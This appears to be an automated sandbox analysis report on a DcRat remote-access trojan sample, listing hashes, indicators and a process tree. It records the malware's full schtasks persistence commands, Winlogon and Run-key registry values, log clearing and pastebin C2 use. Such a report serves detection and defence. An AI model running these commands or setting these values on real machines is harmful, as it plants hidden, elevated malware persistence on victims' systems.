Analysis
-
max time kernel
107s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
26-01-2025 13:26
Static task
static1
Behavioral task
behavioral1
Sample
af4b66ff9b1f5830080860380efa81e4.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
af4b66ff9b1f5830080860380efa81e4.exe
Resource
win10v2004-20241007-en
General
-
Target
af4b66ff9b1f5830080860380efa81e4.exe
-
Size
7.0MB
-
MD5
af4b66ff9b1f5830080860380efa81e4
-
SHA1
53cc9bb12117af3f77354733abc4ef48ad339932
-
SHA256
429a6c2aa2f62fe5b656de97dd25152cd8e653d92a8dd5e75d067308b784bfaf
-
SHA512
8796e8f5cd290dc5cbf009a886796b61d7137630c89067450d863596cd9296eed846ffd5cd53e6750a5c52ba2741f95e3d8169c010ec307371c304a056acf431
-
SSDEEP
196608:M3NyJWZ3HC5ObjKh7+mSGZ5gPZaQC4b5DV2h:MdOWZyCUpt8b9Vy
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Modifies WinLogon for persistence 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\fontwin\\taskeng.exe\", \"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\fontwin\\taskeng.exe\", \"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\", \"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\conhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\fontwin\\taskeng.exe\", \"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\", \"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\cmd.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\fontwin\\taskeng.exe\", \"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\", \"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\cmd.exe\", \"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\smss.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\fontwin\\taskeng.exe\", \"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\", \"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\conhost.exe\", \"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\cmd.exe\", \"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\smss.exe\", \"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\fontwin\\taskeng.exe\"" MsServerHost.exe -
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1700 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1132 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2424 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1996 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2332 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 588 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1552 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 888 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1792 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1688 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1708 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2468 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 616 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1816 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 844 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2308 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2840 1756 schtasks.exe 76 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2168 1756 schtasks.exe 76 -
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
description pid Process procid_target PID 2656 created 1200 2656 twain32.exe 21 PID 2656 created 1200 2656 twain32.exe 21 PID 2656 created 1200 2656 twain32.exe 21 PID 2656 created 1200 2656 twain32.exe 21 PID 2656 created 1200 2656 twain32.exe 21 PID 2656 created 1200 2656 twain32.exe 21 PID 588 created 1200 588 updater.exe 21 PID 588 created 1200 588 updater.exe 21 PID 588 created 1200 588 updater.exe 21 PID 588 created 1200 588 updater.exe 21 PID 588 created 1200 588 updater.exe 21 PID 588 created 1200 588 updater.exe 21 PID 588 created 1200 588 updater.exe 21 -
pid Process 576 powershell.exe 2596 powershell.exe 2124 powershell.exe 2500 powershell.exe 2432 powershell.exe 2664 powershell.exe 1588 powershell.exe 2576 powershell.exe 2592 powershell.exe 2368 powershell.exe 864 powershell.exe 1804 powershell.exe 2688 powershell.exe 2368 powershell.exe 2960 powershell.exe 2856 powershell.exe 1592 powershell.exe 2336 powershell.exe 2948 powershell.exe 1872 powershell.exe 2380 powershell.exe 2500 powershell.exe 2172 powershell.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 5 IoCs
pid Process 2520 MpDefenderCoreService.exe 2656 twain32.exe 588 updater.exe 1524 MsServerHost.exe 576 smss.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx svchost.exe -
Loads dropped DLL 5 IoCs
pid Process 1544 af4b66ff9b1f5830080860380efa81e4.exe 1544 af4b66ff9b1f5830080860380efa81e4.exe 1972 taskeng.exe 1532 cmd.exe 1532 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\smss.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\fontwin\\taskeng.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Program Files\\Java\\jre7\\lib\\audiodg.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\conhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\cmd.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\fontwin\\taskeng.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\conhost.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\Microsoft Synchronization Services\\ADO.NET\\v1.0\\cmd.exe\"" MsServerHost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Recovery\\209d6542-69f6-11ef-b491-62cb582c238c\\smss.exe\"" MsServerHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\MsServerHost = "\"C:\\fontwin\\MsServerHost.exe\"" MsServerHost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 pastebin.com 5 pastebin.com -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2204 cmd.exe 1336 powercfg.exe 1620 powercfg.exe 704 powercfg.exe 1820 powercfg.exe 1068 powercfg.exe 564 powercfg.exe 2060 powercfg.exe 3044 cmd.exe 1700 powercfg.exe -
Drops file in System32 directory 32 IoCs
description ioc Process File created C:\Windows\System32\Tasks\conhostc svchost.exe File opened for modification C:\Windows\System32\Tasks\smsss svchost.exe File created C:\Windows\System32\Tasks\MsServerHostM svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\System32\Tasks\taskengt svchost.exe File created \??\c:\Windows\System32\CSCC9902AE3669E46CBA835304E20B91DA7.TMP csc.exe File opened for modification C:\Windows\System32\Tasks\audiodga svchost.exe File opened for modification C:\Windows\System32\Tasks\audiodg svchost.exe File created C:\Windows\System32\Tasks\cmdc svchost.exe File created C:\Windows\System32\Tasks\smsss svchost.exe File created C:\Windows\System32\Tasks\smss svchost.exe File opened for modification C:\Windows\System32\Tasks\MsServerHostM svchost.exe File created C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC svchost.exe File created C:\Windows\System32\Tasks\audiodga svchost.exe File opened for modification C:\Windows\System32\Tasks\cmd svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC svchost.exe File opened for modification C:\Windows\System32\Tasks\cmdc svchost.exe File opened for modification C:\Windows\System32\Tasks\conhostc svchost.exe File created C:\Windows\System32\Tasks\conhost svchost.exe File opened for modification C:\Windows\System32\Tasks\MsServerHost svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\Tasks\taskeng svchost.exe File created C:\Windows\System32\Tasks\audiodg svchost.exe File opened for modification C:\Windows\System32\Tasks\conhost svchost.exe File created C:\Windows\System32\Tasks\MsServerHost svchost.exe File created C:\Windows\System32\Tasks\cmd svchost.exe File opened for modification C:\Windows\System32\Tasks\smss svchost.exe File opened for modification C:\Windows\System32\Tasks\taskengt svchost.exe File created C:\Windows\System32\Tasks\taskeng svchost.exe File created \??\c:\Windows\System32\byyuy-.exe csc.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2656 set thread context of 1952 2656 twain32.exe 44 PID 588 set thread context of 1624 588 updater.exe 68 PID 588 set thread context of 1368 588 updater.exe 74 PID 588 set thread context of 1932 588 updater.exe 75 -
Drops file in Program Files directory 6 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\updater.exe twain32.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\cmd.exe MsServerHost.exe File created C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\ebf1f9fa8afd6d MsServerHost.exe File created C:\Program Files\Java\jre7\lib\audiodg.exe MsServerHost.exe File created C:\Program Files\Java\jre7\lib\42af1c969fbb7b MsServerHost.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2484 sc.exe 2580 sc.exe 2892 sc.exe 316 sc.exe 2292 sc.exe 1536 sc.exe 2464 sc.exe 1492 sc.exe 2840 sc.exe 1512 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language af4b66ff9b1f5830080860380efa81e4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MpDefenderCoreService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 6 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs dialer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b04a48e3f56fdb01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT dialer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates dialer.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs dialer.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1132 schtasks.exe 2332 schtasks.exe 2308 schtasks.exe 2264 schtasks.exe 1552 schtasks.exe 1792 schtasks.exe 1816 schtasks.exe 844 schtasks.exe 1708 schtasks.exe 616 schtasks.exe 2168 schtasks.exe 1700 schtasks.exe 2424 schtasks.exe 588 schtasks.exe 888 schtasks.exe 1688 schtasks.exe 2488 schtasks.exe 1996 schtasks.exe 2468 schtasks.exe 2840 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2656 twain32.exe 2656 twain32.exe 2500 powershell.exe 2656 twain32.exe 2656 twain32.exe 2656 twain32.exe 2656 twain32.exe 2656 twain32.exe 2656 twain32.exe 2656 twain32.exe 2656 twain32.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 576 powershell.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 2656 twain32.exe 2656 twain32.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe 1952 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2500 powershell.exe Token: SeShutdownPrivilege 1336 powercfg.exe Token: SeDebugPrivilege 1952 dialer.exe Token: SeShutdownPrivilege 1620 powercfg.exe Token: SeAuditPrivilege 868 svchost.exe Token: SeDebugPrivilege 576 powershell.exe Token: SeShutdownPrivilege 564 powercfg.exe Token: SeShutdownPrivilege 2060 powercfg.exe Token: SeAuditPrivilege 868 svchost.exe Token: SeDebugPrivilege 2368 powershell.exe Token: SeShutdownPrivilege 704 powercfg.exe Token: SeShutdownPrivilege 1820 powercfg.exe Token: SeDebugPrivilege 1624 dialer.exe Token: SeAuditPrivilege 868 svchost.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeShutdownPrivilege 1700 powercfg.exe Token: SeShutdownPrivilege 1068 powercfg.exe Token: SeDebugPrivilege 588 updater.exe Token: SeLockMemoryPrivilege 1932 dialer.exe Token: SeAssignPrimaryTokenPrivilege 868 svchost.exe Token: SeIncreaseQuotaPrivilege 868 svchost.exe Token: SeSecurityPrivilege 868 svchost.exe Token: SeTakeOwnershipPrivilege 868 svchost.exe Token: SeLoadDriverPrivilege 868 svchost.exe Token: SeSystemtimePrivilege 868 svchost.exe Token: SeBackupPrivilege 868 svchost.exe Token: SeRestorePrivilege 868 svchost.exe Token: SeShutdownPrivilege 868 svchost.exe Token: SeSystemEnvironmentPrivilege 868 svchost.exe Token: SeUndockPrivilege 868 svchost.exe Token: SeManageVolumePrivilege 868 svchost.exe Token: SeAssignPrimaryTokenPrivilege 868 svchost.exe Token: SeIncreaseQuotaPrivilege 868 svchost.exe Token: SeSecurityPrivilege 868 svchost.exe Token: SeTakeOwnershipPrivilege 868 svchost.exe Token: SeLoadDriverPrivilege 868 svchost.exe Token: SeSystemtimePrivilege 868 svchost.exe Token: SeBackupPrivilege 868 svchost.exe Token: SeRestorePrivilege 868 svchost.exe Token: SeShutdownPrivilege 868 svchost.exe Token: SeSystemEnvironmentPrivilege 868 svchost.exe Token: SeUndockPrivilege 868 svchost.exe Token: SeManageVolumePrivilege 868 svchost.exe Token: SeAssignPrimaryTokenPrivilege 868 svchost.exe Token: SeIncreaseQuotaPrivilege 868 svchost.exe Token: SeSecurityPrivilege 868 svchost.exe Token: SeTakeOwnershipPrivilege 868 svchost.exe Token: SeLoadDriverPrivilege 868 svchost.exe Token: SeSystemtimePrivilege 868 svchost.exe Token: SeBackupPrivilege 868 svchost.exe Token: SeRestorePrivilege 868 svchost.exe Token: SeShutdownPrivilege 868 svchost.exe Token: SeSystemEnvironmentPrivilege 868 svchost.exe Token: SeUndockPrivilege 868 svchost.exe Token: SeManageVolumePrivilege 868 svchost.exe Token: SeAssignPrimaryTokenPrivilege 868 svchost.exe Token: SeIncreaseQuotaPrivilege 868 svchost.exe Token: SeSecurityPrivilege 868 svchost.exe Token: SeTakeOwnershipPrivilege 868 svchost.exe Token: SeLoadDriverPrivilege 868 svchost.exe Token: SeSystemtimePrivilege 868 svchost.exe Token: SeBackupPrivilege 868 svchost.exe Token: SeRestorePrivilege 868 svchost.exe Token: SeShutdownPrivilege 868 svchost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2456 conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1544 wrote to memory of 2520 1544 af4b66ff9b1f5830080860380efa81e4.exe 29 PID 1544 wrote to memory of 2520 1544 af4b66ff9b1f5830080860380efa81e4.exe 29 PID 1544 wrote to memory of 2520 1544 af4b66ff9b1f5830080860380efa81e4.exe 29 PID 1544 wrote to memory of 2520 1544 af4b66ff9b1f5830080860380efa81e4.exe 29 PID 1544 wrote to memory of 2656 1544 af4b66ff9b1f5830080860380efa81e4.exe 30 PID 1544 wrote to memory of 2656 1544 af4b66ff9b1f5830080860380efa81e4.exe 30 PID 1544 wrote to memory of 2656 1544 af4b66ff9b1f5830080860380efa81e4.exe 30 PID 1544 wrote to memory of 2656 1544 af4b66ff9b1f5830080860380efa81e4.exe 30 PID 2520 wrote to memory of 2820 2520 MpDefenderCoreService.exe 31 PID 2520 wrote to memory of 2820 2520 MpDefenderCoreService.exe 31 PID 2520 wrote to memory of 2820 2520 MpDefenderCoreService.exe 31 PID 2520 wrote to memory of 2820 2520 MpDefenderCoreService.exe 31 PID 2428 wrote to memory of 2484 2428 cmd.exe 36 PID 2428 wrote to memory of 2484 2428 cmd.exe 36 PID 2428 wrote to memory of 2484 2428 cmd.exe 36 PID 2428 wrote to memory of 2580 2428 cmd.exe 37 PID 2428 wrote to memory of 2580 2428 cmd.exe 37 PID 2428 wrote to memory of 2580 2428 cmd.exe 37 PID 2428 wrote to memory of 2892 2428 cmd.exe 38 PID 2428 wrote to memory of 2892 2428 cmd.exe 38 PID 2428 wrote to memory of 2892 2428 cmd.exe 38 PID 2428 wrote to memory of 2464 2428 cmd.exe 39 PID 2428 wrote to memory of 2464 2428 cmd.exe 39 PID 2428 wrote to memory of 2464 2428 cmd.exe 39 PID 2428 wrote to memory of 1492 2428 cmd.exe 40 PID 2428 wrote to memory of 1492 2428 cmd.exe 40 PID 2428 wrote to memory of 1492 2428 cmd.exe 40 PID 2204 wrote to memory of 1336 2204 cmd.exe 43 PID 2204 wrote to memory of 1336 2204 cmd.exe 43 PID 2204 wrote to memory of 1336 2204 cmd.exe 43 PID 2656 wrote to memory of 1952 2656 twain32.exe 44 PID 1952 wrote to memory of 428 1952 dialer.exe 5 PID 1952 wrote to memory of 472 1952 dialer.exe 6 PID 1952 wrote to memory of 488 1952 dialer.exe 7 PID 1952 wrote to memory of 496 1952 dialer.exe 8 PID 1952 wrote to memory of 604 1952 dialer.exe 9 PID 1952 wrote to memory of 680 1952 dialer.exe 10 PID 1952 wrote to memory of 752 1952 dialer.exe 11 PID 1952 wrote to memory of 824 1952 dialer.exe 12 PID 1952 wrote to memory of 868 1952 dialer.exe 13 PID 1952 wrote to memory of 972 1952 dialer.exe 15 PID 1952 wrote to memory of 280 1952 dialer.exe 16 PID 1952 wrote to memory of 548 1952 dialer.exe 17 PID 2204 wrote to memory of 1620 2204 cmd.exe 47 PID 2204 wrote to memory of 1620 2204 cmd.exe 47 PID 2204 wrote to memory of 1620 2204 cmd.exe 47 PID 1952 wrote to memory of 1076 1952 dialer.exe 18 PID 1952 wrote to memory of 1116 1952 dialer.exe 19 PID 1952 wrote to memory of 1168 1952 dialer.exe 20 PID 1952 wrote to memory of 1200 1952 dialer.exe 21 PID 1952 wrote to memory of 2032 1952 dialer.exe 23 PID 1952 wrote to memory of 2752 1952 dialer.exe 24 PID 1952 wrote to memory of 2064 1952 dialer.exe 25 PID 1952 wrote to memory of 2656 1952 dialer.exe 30 PID 1952 wrote to memory of 2204 1952 dialer.exe 41 PID 1952 wrote to memory of 1872 1952 dialer.exe 42 PID 1952 wrote to memory of 576 1952 dialer.exe 45 PID 1952 wrote to memory of 1808 1952 dialer.exe 46 PID 2204 wrote to memory of 564 2204 cmd.exe 48 PID 2204 wrote to memory of 564 2204 cmd.exe 48 PID 2204 wrote to memory of 564 2204 cmd.exe 48 PID 1952 wrote to memory of 564 1952 dialer.exe 48 PID 2204 wrote to memory of 2060 2204 cmd.exe 49 PID 2204 wrote to memory of 2060 2204 cmd.exe 49 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:428
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:604
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:2032
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks BIOS information in registry
- Checks processor information in registry
- Enumerates system info in registry
PID:1756 -
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskengt" /sc MINUTE /mo 7 /tr "'C:\fontwin\taskeng.exe'" /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1700
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskeng" /sc ONLOGON /tr "'C:\fontwin\taskeng.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1132
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskengt" /sc MINUTE /mo 13 /tr "'C:\fontwin\taskeng.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2424
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre7\lib\audiodg.exe'" /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1996
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files\Java\jre7\lib\audiodg.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2332
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Program Files\Java\jre7\lib\audiodg.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:588
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\conhost.exe'" /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1552
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\conhost.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:888
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Recovery\209d6542-69f6-11ef-b491-62cb582c238c\conhost.exe'" /rl HIGHEST /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1792
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\cmd.exe'" /f4⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1688
-
-
